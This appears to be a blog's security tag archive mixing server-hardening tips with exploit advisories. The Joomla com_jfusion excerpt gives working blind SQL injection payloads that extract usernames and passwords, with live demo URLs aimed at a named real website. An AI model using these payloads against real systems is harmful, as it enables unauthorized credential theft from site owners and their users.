Tag archive for ‘Security’

How to setup jailed ssh and jailed cgi (beta)

If you run custombuild, the jailed script portion of this guide is in options.conf:

#Jailed shell (beta)
jail=yes

Then type:

./build all_jail

The "./jail/jail_user.sh user" command (run from the custombuild dir) would be used for each user you want to jail. The remaining httpd.conf and other options from this guide still apply.

1) First, install the [...]

Prevent SYN attacks

1. Enable the SYN cookies mechanism on the server by executing the command:
# echo 1 > /proc/sys/net/ipv4/tcp_syncookies

2. Increase the backlog queue to 2048 with the command:
# sysctl -w net.ipv4.tcp_max_syn_backlog="2048"

Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability

[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : Blind SQL injection

Example:
http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code]
n: valid Itemid

Sql code:
+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
etc, etc…

DEMO LIVE:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97
!False ¡¡¡¡
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98
¡True ¡¡¡¡
etc, etc….

I let a script that Now [...]

WordPress

I. VULNERABILITY

WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND

WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. More simply, WordPress is what you use when you want to work with your blogging software, not fight it. [...]

ConfigServer ModSecurity Control

This is an exclusive! and free! add-on product for cPanel/WHM. The product provides you with an interface to the cPanel mod_security implementation from within WHM.

With ConfigServer ModSecurity Control you can:
Disable mod_security rules that have unique ID numbers on a global, per cPanel user or per hosted domain level
Disable mod_security entirely, also on [...]

Top 20 OpenSSH Server Best Security Practices

OpenSSH is an implementation of the SSH protocol. OpenSSH is recommended for remote login, making backups, remote file transfer via scp or sftp, and much more. SSH is well suited to keeping the confidentiality and integrity of data exchanged between two networks and systems. However, the main advantage is server authentication, through the use of public key [...]

Quick check for a ddos via number of connections

A quick and useful command for checking whether a server is under DDoS is:

netstat -anp | grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

That will list the IPs holding the most connections to a server. It is important to remember that the [...]

Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities

Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities [...]

Intrusion Detection With BASE And Snort – Part4

BASE web page setup

Open your favorite web browser and go to: http://www.example.com/base-1.2.5/setup

If everything is set up correctly, you should see the BASE Setup Program page. Click on Continue.

Step 1 of 5: Enter the path to ADODB (/var/www/adodb), then click on Submit Query.

Step 2 of 5: Enter the needed info on the next screen: [...]

PortalXP – Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities

[+] PortalXP – Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org

[+] Download : http://sourceforge.net/projects/portalxp/files/portalxp%20-%20teacher%20edition/Version%201.2/PortalXP1-2.zip/download
[...]
